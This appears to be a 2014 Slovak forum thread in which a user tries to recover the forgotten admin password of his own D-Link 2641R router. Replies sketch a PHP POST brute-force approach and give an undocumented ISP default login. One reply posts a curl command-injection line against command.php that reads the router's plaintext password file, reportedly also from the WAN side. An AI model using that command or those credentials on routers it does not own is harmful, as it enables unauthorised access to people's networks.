Administratorske konto smerovaca d-link 2641r

Sekcia: Aplikácie & Desktop 31.03.2014 | 23:40
Avatar Michal Gregorík Xubuntu 18.04  Používateľ

Zdravim. 

Mam dost neprijemny problem. Potrebujem sa dostat do administratorskeho rozhrania smerovaca (v nadpise). Do bezneho pouzivatelskeho rozhrania smerovaca sa dostanem (konto "user").

Z hesla si pamatam toto: <3pismena><3pismena><stvorcislie/dvojcislie><3pismena><3pismena><stvorcislie/dvojcislie>

</pre>

Viem, ktore pismena tvoria trojice pismen, len neviem ci velke alebo male (kazdu trojicu tvori iba jeden druh). Za dvomi trojicami pismen sa nachadza bud stvorcislie, alebo dvojcislie (2. polovica stvorcislia). Pri cislach viacmenej tiez viem ake tam maju byt.

Skusal som vsetky moznosti (rucne) na prihlasenie, ale kdesi mam chybu. Preto hladam nejaky automatizovany sposob ("brute force" ale s dost velkym upresnenim), aby som mohol vyskusat viac moznosti- manualne je to dost neprakticke.

Keby to bolo v prikazovom riadku, nejaky skript by som dokazal vytvorit (skusal som prihlasenie cez telnet, vratilo mi, ze cas spojenia vyprsal). Ale neviem ako to riesit pri webovom rozhrani.

Polopate este raz: Potrebujem nastroj, ktory pomocou hrubej sily sa bude snazit cez webove rozhranie uhadnut heslo pre "admin" konto smerovaca (heslo ma bud 20/16 znakov, poznam viacmenej vsetky znaky, ale moznosti je pre rucne skusanie aj tak prilis vela).  

Dakujem. Na poziadanie upresnim. Heslo som vymyslal take, aby som nan nezabudol. Prinajhorsom resetnem router do tovarenskych nastaveni. 

ASUS x550vb, Xubuntu 18.04
    • RE: Administratorske konto smerovaca d-link 2641r 31.03.2014 | 23:58
      Avatar bedňa LegacyIce-antiX  Administrátor

      Napís tam My Little Pony :)

      Resetni ho máš po starostiach, najľahšie riešenie.

      Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
      • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 00:04
        Avatar Michal Gregorík Xubuntu 18.04  Používateľ

        Ono som to riesil preto, ze som potreboval ziskat prihlasovacie udaje do Internetu. Ale nejakym zazrakom sa podarilo najst zmluvu o pripojeni, tak uz ho mozem resetnut.

        Ale aj tak by ma zaujimalo, ci by sa to nejako dalo (pre zaujimavost). 

        ASUS x550vb, Xubuntu 18.04
        • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 00:23
          Avatar bedňa LegacyIce-antiX  Administrátor

          Jasne že dalo, takto som ojebkával aj Googla až mi dali banán :) Najjednoduchšie je to cez napísanie skriptu v PHP a posielanie prihlasovacých údajov cez POST. Trebalo by sa s tým vyhrať aby skúšal veľkosť písmen a čakať na odpoveď páč zrovna tebou spomínaný router je pekný prevít a šmejd, takže kľudne ostáva vysieť hluchý tak že bug tvorí aj prirodzenú ochranu pred BFA.

          Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
          • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 00:41
            Avatar Michal Gregorík Xubuntu 18.04  Používateľ

            No nic, nebudem to zatial riesit. Ked budem potrebovat pristup resetnem router. Nechce sa mi ho znovu nastavovat.

            ASUS x550vb, Xubuntu 18.04
    • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 00:35
      Avatar Andrej Lacho Debian, CentOS ...  Administrátor

      Neviem ci nahodu netrepem ale pokial viem tak tieto routre maju admin pristup zakazany defaultne. Teda pokial mas T-com.

      • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 00:37
        Avatar bedňa LegacyIce-antiX  Administrátor

        Prihlasovacie meno:admin, heslo: profesor. Samo že to nieje v dokumentácií páč si v T-COMe myslia že sme debili a urobili by sme niečo zlé :)

        Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
        • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 00:48
          Avatar Andrej Lacho Debian, CentOS ...  Administrátor

          Jasneee, uz si spominam aj ja na to heslo :) pred nedavnom som u bratranca nahraval novy firmware koli tomu a potom som zistil heslo :)

      • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 00:46
        Avatar Michal Gregorík Xubuntu 18.04  Používateľ

        Ja som v admin konte bol a zmenil som hesla pre obe konta. Hesla aj ulozil do textoveho suboru, ale ten sa stratil pri formatovani HDD :) . Schvalne som daval zapamatatelne hesla, ale to pre admina som si zapamatal iba z asi 85%.

        Inak, moji pribuzni maju router presner ovnakeho typu, ale inak vyzera a uz ma iba admin konto. Rozhranie je ale rovnake ako v mojom (len neviem, ci su tam aj admin moznosti).

        ASUS x550vb, Xubuntu 18.04
    • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 10:40
      Avatar Lukáš Staňa Arch, CentOS, Debian  Používateľ

      Ja som svojho času našiel spôsob ako vydolovať heslo z D-Link routra týmto spôsobom:

      curl --data "cmd=cat /var/passwd" http://<IP adresa>/command.php

      Fungovalo to aj z WAN strany, len si nespomeniem presne na model, FW version a HW version. Ono totiž heslo si ukladá pekne ako plaintext :)

      • RE: Administratorske konto smerovaca d-link 2641r 01.04.2014 | 13:25
        Avatar Michal Gregorík Xubuntu 18.04  Používateľ

        Nasiel som (s pomocou vyssie uvedeneho prikazu od Lukasa Stanu) taketo nieco:

        http://www.s3cur1ty.de/node/672

        Ale na mojom routri (D-LINK 2641R) to nefunguje.

        PS: Konecne sa mi podarilo vytvorit predfromatovany text.

        ASUS x550vb, Xubuntu 18.04